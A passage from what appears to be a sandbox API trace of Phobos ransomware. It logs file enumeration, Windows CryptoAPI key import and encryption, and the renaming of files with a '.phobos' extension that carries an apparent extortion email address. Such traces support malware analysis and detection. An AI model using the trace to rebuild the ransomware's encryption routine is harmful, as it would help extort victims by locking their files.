Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.204] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.204] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1334) returned 1 [0200.205] CloseHandle (hObject=0x178) returned 1 [0200.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml")) returned 0x20 [0200.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.205] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.206] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=13427) returned 1 [0200.206] CloseHandle (hObject=0x178) returned 1 [0200.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml")) returned 0x20 [0200.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.206] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.207] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1512) returned 1 [0200.207] CloseHandle (hObject=0x178) returned 1 [0200.207] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml")) returned 0x20 [0200.207] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.207] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.208] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=11364) returned 1 [0200.208] CloseHandle (hObject=0x178) returned 1 [0200.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml")) returned 0x20 [0200.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.208] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.209] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=0) returned 1 [0200.209] CloseHandle (hObject=0x178) returned 1 [0200.209] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.210] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0200.211] CloseHandle (hObject=0x178) returned 1 [0200.211] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile10.bmp")) returned 0x20 [0200.211] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile10.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.211] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.212] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0200.212] CloseHandle (hObject=0x178) returned 1 [0200.212] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile11.bmp")) returned 0x20 [0200.212] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile11.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.212] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.213] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0200.213] CloseHandle (hObject=0x178) returned 1 [0200.213] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile12.bmp")) returned 0x20 [0200.213] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile12.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.213] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.214] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=48824) returned 1 [0200.214] CloseHandle (hObject=0x178) returned 1 [0200.214] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile13.bmp")) returned 0x20 [0200.214] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile13.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.214] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.215] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0200.215] CloseHandle (hObject=0x178) returned 1 [0200.215] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile14.bmp")) returned 0x20 [0200.215] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile14.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.215] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.216] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0200.216] CloseHandle (hObject=0x178) returned 1 [0200.216] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile15.bmp")) returned 0x20 [0200.216] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile15.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.216] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.217] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0200.217] CloseHandle (hObject=0x178) returned 1 [0200.217] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile16.bmp")) returned 0x20 [0200.217] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile16.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.217] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.218] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0200.328] CloseHandle (hObject=0x178) returned 1 [0200.328] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile17.bmp")) returned 0x20 [0200.328] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile17.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.329] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.331] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=67) returned 1 [0200.331] CloseHandle (hObject=0x178) returned 1 [0200.331] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini")) returned 0x2026 [0200.331] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.331] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.331] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.332] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.334] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa328e8) returned 1 [0200.334] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.334] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x43, lpOverlapped=0x0) returned 1 [0200.335] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0200.335] WriteFile (in: hFile=0x100, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x50, lpOverlapped=0x0) returned 1 [0200.336] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32928) returned 1 [0200.336] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.336] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0200.336] CryptDestroyKey (hKey=0xa32928) returned 1 [0200.336] 